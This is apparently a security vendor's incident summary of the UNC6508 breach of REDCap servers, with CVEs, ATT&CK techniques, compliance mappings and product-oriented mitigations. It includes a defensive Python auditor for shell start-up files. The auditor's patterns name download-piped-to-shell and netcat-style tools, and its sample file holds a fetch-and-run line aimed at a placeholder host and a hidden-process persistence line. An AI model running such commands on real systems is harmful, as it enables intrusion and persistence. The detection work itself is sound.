Executive Summary
Between September 2023 and November 2025, the Chinese state-sponsored group UNC6508 infiltrated vulnerable REDCap servers at a North American medical research institution. They deployed custom malware named Infinitered, which harvested credentials and established a backdoor, enabling prolonged data exfiltration. The attackers exploited REDCap's widespread use in medical research to access sensitive information undetected for over a year.
This incident underscores the persistent threat posed by nation-state actors targeting critical research sectors. The sophisticated methods employed, including the abuse of legitimate features for data exfiltration, highlight the evolving tactics in cyberespionage campaigns.
Why This Matters Now
The UNC6508 breach highlights the urgent need for organizations to secure widely-used platforms like REDCap, as attackers increasingly exploit such tools to access sensitive data. The prolonged undetected access emphasizes the importance of robust monitoring and timely patching to defend against sophisticated cyberespionage threats.
Attack Path Analysis
UNC6508 exploited vulnerable REDCap servers to gain initial access, escalated privileges to obtain administrative credentials, moved laterally within the network, established command and control through a backdoor, exfiltrated sensitive data via email rules, and maintained long-term access to the compromised systems.
Kill Chain Progression
Initial Compromise
Description
UNC6508 exploited vulnerabilities in externally facing REDCap servers to gain initial access.
Related CVEs
CVE-2024-37394
CVSS 5.4. Stored cross-site scripting (XSS) vulnerability in REDCap versions prior to 14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected Products:
Vanderbilt University REDCap – < 14.2.1
Exploit Status:
no public exploit
CVE-2024-37395
CVSS 5.4. Stored cross-site scripting (XSS) vulnerability in REDCap versions prior to 14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected Products:
Vanderbilt University REDCap – < 14.2.1
Exploit Status:
no public exploit
CVE-2024-37396
CVSS 5.4. Stored cross-site scripting (XSS) vulnerability in REDCap versions prior to 14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected Products:
Vanderbilt University REDCap – < 14.2.1
Exploit Status:
no public exploit
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter
Event Triggered Execution: Unix Shell Configuration Modification
OS Credential Dumping
Application Layer Protocol: Web Protocols
Exfiltration Over Web Service: Exfiltration to Cloud Storage
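The "Unix Shell Configuration Modification" technique listed above (persistence by appending commands to shell start-up files) can be audited on a defender's host. The following script is an added example, not code from the original report or from Google's analysis of UNC6508; the file list and the suspicious-line heuristics are assumptions chosen for illustration, and the sample .bashrc is constructed.

```python
"""Audit Unix shell start-up files for login-time persistence entries."""
import os
import re

# Start-up files that run on every interactive login (assumed set, extend as needed).
PROFILE_FILES = ("/etc/profile", "/etc/bash.bashrc", "~/.bashrc",
                 "~/.bash_profile", "~/.profile", "~/.zshrc")

# Heuristics (assumptions, not from the report): lines that fetch-and-run code,
# decode an embedded payload, start a raw network tool, source a file from a
# world-writable directory, or background a detached process at login.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes an encoded payload"),
    (re.compile(r"\b(nc|ncat|socat)\b"), "spawns a raw network tool"),
    (re.compile(r"(?:^|\s)(?:source|\.)\s+(?:/tmp|/dev/shm|/var/tmp)/"),
     "sources a file from a world-writable directory"),
    (re.compile(r"\bnohup\b.*&\s*$"), "backgrounds a detached process at login"),
]

def audit_profile(path, text):
    """Return one finding per non-comment line that matches a heuristic."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments cannot execute
        for pattern, reason in SUSPICIOUS:
            if pattern.search(stripped):
                findings.append({"file": path, "line": lineno,
                                 "reason": reason, "text": stripped})
                break
    return findings

def audit_files(files):
    """files: {display_path: file_contents}; returns all findings in order."""
    return [f for path, text in files.items() for f in audit_profile(path, text)]

def load_local_profiles():
    """Read the start-up files that actually exist on this host."""
    files = {}
    for p in PROFILE_FILES:
        full = os.path.expanduser(p)
        if os.path.isfile(full):
            with open(full, errors="replace") as fh:
                files[p] = fh.read()
    return files

# Constructed sample: a normal .bashrc with one appended persistence line.
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash for non-login shells
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
# curl http://example.invalid/x | sh   (commented out, must not fire)
nohup /dev/shm/.cache/agent >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for f in audit_files({"~/.bashrc": SAMPLE_BASHRC}):
        print(f"{f['file']}:{f['line']} {f['reason']}: {f['text']}")
```

Replace the sample dictionary with `load_local_profiles()` to run the same audit against the host's own files; a hit is a lead for review, not proof of compromise.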
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
NIST SP 800-53 – Flaw Remediation
Control ID: SI-2
PCI DSS 4.0 – System and Software Security
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Data Security
Control ID: Pillar 3: Data
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
Primary target with REDCap platform breaches exposing medical research data, requiring HIPAA compliance controls like encrypted traffic and zero trust segmentation.
Higher Education/Academia
Universities using REDCap for research face credential harvesting attacks, needing egress security controls and threat detection to protect academic medical studies.
Pharmaceuticals
Drug discovery research vulnerable to espionage campaigns targeting clinical trial data through compromised REDCap servers and email exfiltration techniques.
Government Administration
Military readiness and geo-strategic policy data targeted by Chinese APT groups, requiring multicloud visibility and anomaly detection for defense applications.
Sources
- Chinese hackers breach REDCap servers, steal medical research: https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/
- Google exposes China espionage group that’s been lurking in networks undetected since 2023: https://cyberscoop.com/google-unc6508-china-espionage-threat/
- Chinese Hackers Target Medical, Military, and AI Research in North America: https://www.securityweek.com/chinese-hackers-target-medical-military-and-ai-research-in-north-america/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have constrained the attacker's ability to move laterally, escalate privileges, and exfiltrate data by enforcing strict segmentation and identity-based access controls.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's initial access may have been limited to the compromised server, reducing the potential for further exploitation.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges could have been constrained, reducing the risk of unauthorized access to sensitive systems.
Control: East-West Traffic Security
Mitigation: The attacker's lateral movement within the network could have been restricted, limiting access to additional systems.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish and maintain command and control channels may have been disrupted, reducing the effectiveness of the backdoor.
Control: Egress Security & Policy Enforcement
Mitigation: The attacker's data exfiltration efforts could have been hindered, reducing the risk of sensitive information being transmitted to external destinations.
The attacker's prolonged access to compromised systems could have been limited, reducing the potential impact on sensitive research data.
Impact at a Glance
Affected Business Functions
- Clinical Data Management
- Research Data Analysis
- Regulatory Compliance Reporting
Estimated downtime: N/A
Estimated loss: N/A
Sensitive medical research data, including clinical trial results and patient information.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement within the network.
- Deploy East-West Traffic Security controls to monitor and control internal traffic flows.
- Utilize Multicloud Visibility & Control to detect and respond to anomalous activities across cloud environments.
- Enforce Egress Security & Policy Enforcement to prevent unauthorized data exfiltration.
- Regularly update and patch REDCap servers to mitigate known vulnerabilities.